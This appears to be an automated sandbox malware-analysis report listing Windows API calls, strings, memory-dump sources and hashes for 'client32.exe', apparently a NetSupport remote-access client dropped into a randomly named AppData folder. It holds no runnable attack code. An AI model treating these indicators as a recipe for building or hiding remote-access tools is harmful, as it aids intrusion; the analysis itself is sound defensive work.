                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                              • API String ID: 3804766296-4122679463
                                                                              • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                              • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6EEF4FC4
                                                                              • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6EEF8E0D,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FE4
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressEnumErrorLastModulesProcProcess
                                                                              • String ID: EnumProcessModules
                                                                              • API String ID: 3858832252-3735562946
                                                                              • Opcode ID: 351c1b78ccc66f28b11d4baa3de3afe621d4e5b4e3ef8ffba07ad40319bec8af
                                                                              • Instruction ID: 9b5e3539268b9765696cce1e822b7e7c024a75bc75048a1df169525063cc1a5d
                                                                              • Opcode Fuzzy Hash: 351c1b78ccc66f28b11d4baa3de3afe621d4e5b4e3ef8ffba07ad40319bec8af
                                                                              • Instruction Fuzzy Hash: F9F05E72614618AFC710DF94D844E5B77A9EB48721F00881AF95A97340D6B0E811CBA0
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6EEF5014
                                                                              • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF5034
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6EEF8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6EEF503D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorFileLastModuleNameProc
                                                                              • String ID: GetModuleFileNameExA
                                                                              • API String ID: 4084229558-758377266
                                                                              • Opcode ID: 1fabd4b822d24a13f10a9ce8ba3b5351b1450e6212a08d877d49c1d00d782497
                                                                              • Instruction ID: c6fbe275ef727ad5450fda64680c7cdd1a4092173ee26769a7af6b18966e7191
                                                                              • Opcode Fuzzy Hash: 1fabd4b822d24a13f10a9ce8ba3b5351b1450e6212a08d877d49c1d00d782497
                                                                              • Instruction Fuzzy Hash: A9F0FEB2624618ABC720DF94E844F5777A9EB48751F10851AF94697240D6B1E8148BE1
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ChangeCloseCreateFindNotificationThread__wcstoi64
                                                                              • String ID: *AutoICFConfig$Client
                                                                              • API String ID: 3838223534-59951473
                                                                              • Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                              • Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
                                                                              • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                              APIs
                                                                              • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                              • String ID: Push
                                                                              • API String ID: 1566154052-4278761818
                                                                              • Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                              • Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
                                                                              • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,?,?,6EEFDA7F,?,00000000), ref: 6EEFA503
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6EEFA568
                                                                              • Sleep.KERNEL32(00000000,?,6EEFDA7F,?,00000000), ref: 6EEFA581
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,00000000), ref: 6EEFA5B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                              • String ID:
                                                                              • API String ID: 4212191310-0
                                                                              • Opcode ID: 28c54fb12dbaa26732038b9a7929bcd56687d2fdb348d8162902d2e31fc99937
                                                                              • Instruction ID: 87be5300bf0571633a1a46523ea4ce05f9f4b03de0490f167c1704c5bb622daa
                                                                              • Opcode Fuzzy Hash: 28c54fb12dbaa26732038b9a7929bcd56687d2fdb348d8162902d2e31fc99937
                                                                              • Instruction Fuzzy Hash: 3421DAB2960E11DFDB319F98C850796B7BEAF82319F210827D8599B740D371A8428BD1
                                                                              APIs
                                                                              • GetCommandLineA.KERNEL32 ref: 00F71027
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00F7107B
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00F71096
                                                                              • ExitProcess.KERNEL32 ref: 00F710A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3402039725.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F70000, based on PE: true
                                                                              • Associated: 00000004.00000002.3402020033.0000000000F70000.00000002.00000001.01000000.00000006.sdmp
                                                                              • Associated: 00000004.00000002.3402065751.0000000000F72000.00000002.00000001.01000000.00000006.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f70000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                              • String ID:
                                                                              • API String ID: 2164999147-0
                                                                              • Opcode ID: a7522bc263354a55a09cf154841bfcf8877def38b19aef786e50783bd966e2c4
                                                                              • Instruction ID: c9a1e231b0d4952bc1ef2f577d36db22b7e7d5bd0e9a970b8de5ad93163acd31
                                                                              • Opcode Fuzzy Hash: a7522bc263354a55a09cf154841bfcf8877def38b19aef786e50783bd966e2c4
                                                                              • Instruction Fuzzy Hash: 1311C820C043C85AEF315F688848BEABF95BF06390F248046DCDDA614AD25648CFE777
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 1314093303-0
                                                                              • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                              • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                              • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                              • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CurrentFileModuleNameProcess
                                                                              • String ID: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                                                              • API String ID: 2251294070-2350711247
                                                                              • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                              • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                              • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 11110262
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                              • API String ID: 2803934178-2363596943
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: \\.\NSWFPDrv
                                                                              • API String ID: 3498533004-85019792
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc
                                                                              • String ID:
                                                                              • API String ID: 1679841372-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 6EEF8FE4
                                                                              • getsockname.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF9005
                                                                              • WSAGetLastError.WSOCK32(?,?,00000010,?,037F2CD0,?), ref: 6EEF902E
                                                                                • Part of subcall function 6EEF5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                              • String ID:
                                                                              • API String ID: 3066294524-0
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                              • __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                              • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                              • String ID:
                                                                              • API String ID: 1847508633-0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00FD3B90,?,00000001,00000001), ref: 1109EDC3
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                              • String ID:
                                                                              • API String ID: 2256153495-0
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111F1908,EE49F673,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                              • EnterCriticalSection.KERNEL32(111F1908,EE49F673,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                              • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                              • String ID:
                                                                              • API String ID: 3991485460-0
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ??CTL32.DLL
                                                                              • API String ID: 1029625771-2984404022
                                                                              • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                              • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                              APIs
                                                                              • inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: inet_ntoa
                                                                              • String ID: gfff
                                                                              • API String ID: 1879540557-1553575800
                                                                              • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                              • Instruction ID: ea56a2f872ba68cafff21d01fd6f7a0a8de03c7b91405e9f18aca77e477b9bbb
                                                                              • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                              • Instruction Fuzzy Hash: 88115C216082D7CBC3168A6EB8606D6BFD5DBA7254B288569D8C9CB301D611DC0FC7D1
                                                                              APIs
                                                                              • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DriveType
                                                                              • String ID: ?:\
                                                                              • API String ID: 338552980-2533537817
                                                                              • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                              • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                              APIs
                                                                                • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenwvsprintf
                                                                              • String ID: Error %d Opening regkey %s
                                                                              • API String ID: 1772833024-3994271378
                                                                              • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                              • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                              APIs
                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Closewvsprintf
                                                                              • String ID: Error %d closing regkey %x
                                                                              • API String ID: 843752472-892920262
                                                                              • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                              • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02CDB888,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleLibraryLoadModule
                                                                              • String ID: NSMTRACE
                                                                              • API String ID: 4133054770-4175627554
                                                                              • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                              • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              • API String ID: 1029625771-80456845
                                                                              • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                              • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,6EEF8DC8), ref: 6EEF4F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: nslsp.dll
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110750EF
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary_memset
                                                                              • String ID:
                                                                              APIs
